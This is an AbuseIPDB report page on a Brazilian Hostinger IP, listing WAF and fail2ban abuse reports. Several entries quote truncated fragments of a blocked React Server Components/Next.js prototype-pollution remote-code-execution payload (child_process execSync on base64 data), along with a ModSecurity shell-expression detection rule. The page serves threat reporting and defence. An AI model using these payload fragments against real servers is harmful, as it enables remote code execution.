JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 212.85.22.138

212.85.22.138 was found in our database!

This IP was reported 46 times. Confidence of Abuse is 48%: ?

48%

ISP	Hostinger International Limited
Usage Type	Data Center/Web Hosting/Transit
ASN	AS47583
Hostname(s)	srv920359.hstgr.cloud
Domain Name	hostinger.com
Country	🇧🇷 Brazil
City	Sao Paulo, Sao Paulo

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 212.85.22.138

Whois 212.85.22.138

IP Abuse Reports for 212.85.22.138:

This IP address has been reported a total of 46 times from 23 distinct sources. 212.85.22.138 was first reported on April 11th 2026, and the most recent report was 1 week ago.

Old Reports: The most recent abuse report for this IP address is from 1 week ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇸🇮 administrator	2026-06-02 22:10:54 (1 week ago)	2026-06-02 00:00:58,482 fail2ban.actions [1162]: NOTICE [ninjafirewall-syslog] Ban 212.85.22 ... show more 2026-06-02 00:00:58,482 fail2ban.actions [1162]: NOTICE [ninjafirewall-syslog] Ban 212.85.22.138 2026-06-02 00:00:58,482 fail2ban.actions [1162]: NOTICE [ninjafirewall-syslog] Ban 212.85.22.138 ... show less	Bad Web Bot Web Spam Email Spam Blog Spam Port Scan Brute-Force Web App Attack
🇫🇷 masterguru	2026-06-02 00:50:37 (1 week ago)	(modsec_5080) ModSec 5080: Infrastructure subdomain probe from 212.85.22.138 (BR/Brazil/srv920359.hs ... show more (modsec_5080) ModSec 5080: Infrastructure subdomain probe from 212.85.22.138 (BR/Brazil/srv920359.hstgr.cloud): 2 in the last 3600 secs (0-196) show less	Hacking
🇬🇧 pinguin	2026-05-23 16:43:16 (3 weeks ago)	Triggered Cloudflare WAF (firewallManaged) from BR. Action taken: BLOCK Protocol: HTTP/1.1 (POST met ... show more Triggered Cloudflare WAF (firewallManaged) from BR. Action taken: BLOCK Protocol: HTTP/1.1 (POST method) Endpoint: / UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 This report was generated by: https://github.com/sefinek/Cloudflare-WAF-To-AbuseIPDB show less	Bad Web Bot
🇱🇻 garmtech.com	2026-05-23 08:33:02 (3 weeks ago)	IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js ... show more IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js < 15.0.5/16.0.7 (CVE-2025-55182, CVE-2025-66478) show less	Hacking
Anonymous	2026-05-20 13:26:28 (3 weeks ago)	SIEM ALERT AUTO REPORT	Email Spam
🇩🇪 BerndG17	2026-05-19 13:45:00 (3 weeks ago)	BASE64-encoded injection - [POST:0 = {"then":"$1:__proto__:then","status":"resolved_model","reason": ... show more BASE64-encoded injection - [POST:0 = {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync(Buffer.f...] show less	Web App Attack SQL Injection
🇩🇪 4server	2026-05-18 23:50:35 (3 weeks ago)	[TueMay1901:50:32.7278222026][security2:error][pid1973267:tid1973318][client212.85.22.138:0]ModSecur ... show more [TueMay1901:50:32.7278222026][security2:error][pid1973267:tid1973318][client212.85.22.138:0]ModSecurity:Accessdeniedwithcode403$phase2$.Patternmatch\"$\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\\\\\\\\\$\\|.\\)\\\\\\\\\)\\|\\\\\\\\{.\\\\\\\\\}\)\\|[\<\>]\\\\\\\\$.\\\\\\\\\$\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\${b}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require$child_process$.execsync\(buffer.from\(zwnobyakkcg0msoynzepktsgzwnobyanpt09re9uru5wpt09jzsgy2f0ic5lbnyglmvudi5sb2nhbcauzw52lnbyb2r1y3rpb24glmvudi5kzxzlbg9wbwvudcauzw52lnn0ywdpbmcglmvudi5iywnrdxagli4vlmvudiauli8uli8uzw52idil2rldi9udwxsoybly2hvicc9pt1quklovevovj09psc7ihbyaw50zw...\"][tag\"attack-rce\"][hostnam show less	Port Scan Brute-Force Web App Attack
🇮🇩 David Koswari	2026-05-18 05:14:00 (4 weeks ago)	REQ_BLOCKED_SECURITY	DDoS Attack FTP Brute-Force Ping of Death Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇩🇪 4server	2026-05-17 11:43:33 (4 weeks ago)	[SunMay1713:43:31.1379272026][security2:error][pid3786366:tid3786393][client212.85.22.138:0]ModSecur ... show more [SunMay1713:43:31.1379272026][security2:error][pid3786366:tid3786393][client212.85.22.138:0]ModSecurity:Accessdeniedwithcode403$phase2$.Patternmatch\"$\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\\\\\\\\\$\\|.\\)\\\\\\\\\)\\|\\\\\\\\{.\\\\\\\\\}\)\\|[\<\>]\\\\\\\\$.\\\\\\\\\$\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\${b}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require$child_process$.execsync\(buffer.from\(zwnobyakkcg0msoynzepktsgzwnobyanpt09re9uru5wpt09jzsgy2f0ic5lbnyglmvudi5sb2nhbcauzw52lnbyb2r1y3rpb24glmvudi5kzxzlbg9wbwvudcauzw52lnn0ywdpbmcglmvudi5iywnrdxagli4vlmvudiauli8uli8uzw52idil2rldi9udwxsoybly2hvicc9pt1quklovevovj09psc7ihbyaw50zw...\"][tag\"attack-rce\"][hostnam show less	Port Scan Brute-Force Web App Attack
🇨🇭 4server	2026-05-17 11:19:43 (4 weeks ago)	[SunMay1713:19:40.9539562026][security2:error][pid1882215:tid1882460][client212.85.22.138:0]ModSecur ... show more [SunMay1713:19:40.9539562026][security2:error][pid1882215:tid1882460][client212.85.22.138:0]ModSecurity:Accessdeniedwithcode403$phase2$.Patternmatch\"$\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\\\\\\\\\$\\|.\\)\\\\\\\\\)\\|\\\\\\\\{.\\\\\\\\\}\)\\|[\<\>]\\\\\\\\$.\\\\\\\\\$\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\${b}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require$child_process$.execsync\(buffer.from\(zwnobyakkcg0msoynzepktsgzwnobyanpt09re9uru5wpt09jzsgy2f0ic5lbnyglmvudi5sb2nhbcauzw52lnbyb2r1y3rpb24glmvudi5kzxzlbg9wbwvudcauzw52lnn0ywdpbmcglmvudi5iywnrdxagli4vlmvudiauli8uli8uzw52idil2rldi9udwxsoybly2hvicc9pt1quklovevovj09psc7ihbyaw50zw...\"][tag\"attack-rce\"][hostnam show less	Hacking Web App Attack
🇱🇻 garmtech.com	2026-05-16 15:25:06 (4 weeks ago)	IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js ... show more IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js < 15.0.5/16.0.7 (CVE-2025-55182, CVE-2025-66478) show less	Hacking
🇱🇻 garmtech.com	2026-05-15 00:53:09 (1 month ago)	IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js ... show more IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js < 15.0.5/16.0.7 (CVE-2025-55182, CVE-2025-66478) show less	Hacking
🇩🇪 sdos.es	2026-05-14 05:15:45 (1 month ago)	"Remote Command Execution: Unix Shell Expression Found - Matched Data: ${b} 307 `}) _chunks:$q2 _for ... show more "Remote Command Execution: Unix Shell Expression Found - Matched Data: ${b} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}} found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(buffer.from(zwnobyakkcg0msoynzepktsgzwnobyanpt09re9uru5wpt09jzsgy2f0ic5lbnyglmvudi5sb2nhbcauzw52lnbyb2r1y3rpb24glmvudi5kzxzlbg9wbwvudcauzw52lnn0ywdpbmcglmvudi5iywnrdxagli4vlmvudiauli8uli8uzw52idi l2rldi9udwxsoybly2hvicc9pt1quklovevovj09psc7ihbyaw50zw..." show less	Web App Attack
🇩🇪 dpsbs	2026-05-13 21:31:33 (1 month ago)	multiple ips intrustions detected	Hacking
🇱🇻 garmtech.com	2026-05-11 06:01:08 (1 month ago)	IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js ... show more IM360 WAF: RCE via prototype pollution in React Server Components < 19.0.1/19.1.2/19.2.1 or Next.js < 15.0.5/16.0.7 (CVE-2025-55182, CVE-2025-66478) show less	Hacking

Showing 1 to 15 of 46 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇨🇳 222.137.102.234

🇺🇸 107.167.34.125

🇵🇱 87.251.64.147

🇮🇩 36.95.221.140

🇳🇱 34.141.162.31

🇨🇦 34.95.42.158

🇺🇸 2604:a880:400:d1:0:4:962e:d001

🇷🇺 178.185.136.57

🇧🇾 178.120.6.191

🇮🇳 122.168.194.41

🇰🇷 34.158.201.110

🇮🇹 2.197.114.21

🇨🇳 183.243.222.188

🇺🇸 165.154.206.34

🇻🇳 163.61.182.82

🇺🇸 139.64.164.125

🇻🇳 123.25.123.7

🇨🇳 118.196.118.73

🇵🇭 112.202.123.118

🇸🇬 103.13.207.88